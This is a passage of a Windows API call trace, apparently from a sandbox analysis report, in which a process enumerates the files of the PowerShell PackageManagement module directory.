ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.769] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0280.770] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.770] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0280.770] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.771] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.771] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0280.771] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0280.771] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0280.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0280.772] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.772] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.772] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0280.772] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0280.773] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0280.773] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0280.773] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0280.773] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0280.774] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0280.774] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0280.774] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0280.774] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0280.774] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0280.775] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0280.775] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0280.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0280.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0280.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0280.775] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.776] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.776] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0280.776] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0280.776] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0280.777] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0280.777] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0280.777] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0280.777] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0280.777] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0280.778] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0280.778] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0280.778] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0280.778] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.778] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0280.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0280.779] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0280.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0280.779] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c9b0 | out: lpFileInformation=0x653ef8c9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0280.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0280.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0280.780] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c630 | out: lpFindFileData=0x653ef8c630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.780] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.781] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0280.781] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, 